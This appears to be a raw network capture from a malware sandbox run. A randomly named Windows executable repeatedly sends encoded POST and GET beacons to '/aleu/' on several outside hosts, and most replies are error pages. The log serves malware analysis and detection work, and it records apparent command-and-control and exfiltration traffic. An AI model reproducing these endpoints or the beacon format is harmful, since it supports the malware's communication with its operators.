                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
Apr 26, 2024 07:43:47.775866032 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
Apr 26, 2024 07:43:47.775883913 CEST | 1245 | IN
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 49755 | 103.93.124.160 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:43:54.447371960 CEST | 738 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Origin: http://www.83634.cn
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.83634.cn/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=yk3RZmdKeyh6WRRXgEjSYwvzNN3QlPh7lpd/3981yqzvNvD2Ik3p4ZyABlah0mIj09tV0RDppg6mzHaj4B3y4plOu+1MaIfhfHpgB+tHpJa332nFwsXzHiuQSpD0AXmTrSEYcbJrDkHbBjc5QnfbtU3PfgjTmI0CzLfY2L2N+tLXOmC1tkTV4aaz9PdVOfhcIxQuKu7QhU1lupi5nQ==
Apr 26, 2024 07:43:54.799432993 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:54 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
                                                                                                                                                                          Apr 26, 2024 07:43:54.799529076 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                                                                                                                                                                          Apr 26, 2024 07:43:54.799617052 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                                                                                                                                                                          Apr 26, 2024 07:43:54.799721956 CEST | 458 | IN
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          30 | 192.168.2.7 | 49756 | 103.93.124.160 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:43:57.315180063 CEST | 758 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Origin: http://www.83634.cn
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.83634.cn/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=yk3RZmdKeyh6EABXsHLSQwvwBt3Qvvh/lpR/3+xyyfrvUK/2PmPp/ZyAKFbrwmJt09hd0QPppkamzGKj5yft45lIne1OeIfhfHpgB/cspJy33m7FiZ6lEiuXFZD0RHmtrSFPcaVBDm/bBis5Q0HYjk2ECwiYptRX+7LW66Cx58HLCwfX3Gf5mLiI5N5jZ58pKwU2HMPx+jQPj7D9xlVvXKrvUecgTv+4I7+Y9+4=
                                                                                                                                                                          Apr 26, 2024 07:43:57.652977943 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:57 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
                                                                                                                                                                          Apr 26, 2024 07:43:57.653024912 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                                                                                                                                                                          Apr 26, 2024 07:43:57.653249025 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                                                                                                                                                                          Apr 26, 2024 07:43:57.653268099 CEST | 458 | IN
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          31 | 192.168.2.7 | 49757 | 103.93.124.160 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:00.229370117 CEST | 1771 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Origin: http://www.83634.cn
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.83634.cn/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:44:00.567687035 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:00 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
Apr 26, 2024 07:44:00.567754030 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
Apr 26, 2024 07:44:00.567892075 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
Apr 26, 2024 07:44:00.567936897 CEST | 458 | IN
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49758 | 103.93.124.160 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:03.097054958 CEST | 495 | OUT | GET /aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:44:03.435219049 CEST | 1289 | IN | HTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:03 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
Apr 26, 2024 07:44:03.435328960 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
Apr 26, 2024 07:44:03.435499907 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
Apr 26, 2024 07:44:03.435540915 CEST | 458 | IN
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 49759 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:08.865376949 CEST | 741 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=QaERqkegBWwLb4YeC203YGAyvwvOhscV/bFTo2Rc4CJMZUaoBuX4Mg80N1zMRd1f9jBjAL6ij87iGAqramN+WLhKgmqEO9Lh3ib94mkdBhkCO37Vayv0jV0mTNPzKambLudegUcTHhEkUoE7InSuUHnWuBROGHpLA/QjvCh0TQsFZP0Mi79O+4swb2ohkVzmO5tY085W1G5rUdgcmw==
Apr 26, 2024 07:44:09.108086109 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49760 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:11.645379066 CEST | 761 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=QaERqkegBWwLJtQeBVc3ZmAzgQvOrMdc/bZTozpM4wtMY2CoT6j4Pg80YFyHMN1i9jNrAKWij8viGBarZVV9ErhyrGqGTNLh3ib94mxKBgMCOHrVbTv3t105E9PzOamfLud8gQ85HjskUo07IymtN3nUghQ+XzwkL/YBphh5WB81RZpu4ZxigpULf0MXzzuTM4pA5eN3qxcBZPBYwND7v5M9b2FCBkd7ksFKtC8=
Apr 26, 2024 07:44:11.907088041 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49761 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:44:14.424132109 CEST | 1774 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Origin: http://www.polhi.lol
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.polhi.lol/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:44:14.666940928 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          36 | 192.168.2.7 | 49762 | 91.195.240.19 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:17.207461119 CEST | 496 | OUT | GET /aleu/?MzYDklf=dYsxpTaff089Ev8jBScoXXc5jj7jmMQs0q0Eu2dlyBwZckm7Y/SiQVQbLF6BJ7sO5g5GU6+4isz0GnabBFwpFqtsgzPEUtDw4CvXwSk6GQMDGBmxey3onV8TCNPZOIX4PotVszp0FWYE&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.polhi.lol
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:44:17.450356007 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                          content-length: 93
                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          37 | 192.168.2.7 | 49763 | 3.125.172.46 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:23.608436108 CEST | 774 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=nLw7bAWdiaPGFb37QukyE/Gu2MNj8DFQNuDUs/1FLZlpxygynfkIHptjYjDqy8nmcnaWRweS4tTULMFqEELzGvDLlU1eTEOYmTU7mxXujS3OA7PeNX9+gU7hT1vSQ8FzMZ66487+1ciNTaFPsivlGIbtKtXUWYmlY76cvo/P9+XNIBOmg7xe2gI03oExNNgf/XJubAwxvto85Ha3OA==
                                                                                                                                                                          Apr 26, 2024 07:44:23.901870966 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:23 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=4sf9f9dr8163fg43an66jnm1vs; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Encoding: gzip


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          38 | 192.168.2.7 | 49764 | 3.125.172.46 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:44:26.375181913 CEST | 794 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.valentinaetommaso.it
                                                                                                                                                                          Origin: http://www.valentinaetommaso.it
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.valentinaetommaso.it/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=nLw7bAWdiaPGH+/7DIsyTPGtzMNjpzFcNuHUs+weIqRpxXcymbQIO5tjXDDrvMnvcnG0R0WS4tXULJ5qHzfwG/DJjU1mdkOYmTU7mwzUjSvOAvzeN2958E7mDFvSU8FJMZ7v44bU1eqNTYdPs3D6TYbjUdW3RYPCReKZrZbal9jUAXTE6Z9yoxwPzqgHar9q9WN2WiEQwaNW0V7zYyN/kzwC48jbKJmPRgY6SfM=
                                                                                                                                                                          Apr 26, 2024 07:44:26.681323051 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:44:26 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=983qcbk7i5o6majh8bh673shg4; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Encoding: gzip


                                                                                                                                                                          Session ID: 39
                                                                                                                                                                          Source IP: 192.168.2.7
                                                                                                                                                                          Source Port: 49765
                                                                                                                                                                          Destination IP: 3.125.172.46
                                                                                                                                                                          Destination Port: 80
                                                                                                                                                                          PID: 2912
                                                                                                                                                                          Process: C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe

                                                                                                                                                                          Timestamp: Apr 26, 2024 07:44:29.143369913 CEST
                                                                                                                                                                          Bytes transferred: 1807
                                                                                                                                                                          Direction: OUT
                                                                                                                                                                          Data:
                                                                                                                                                                          POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
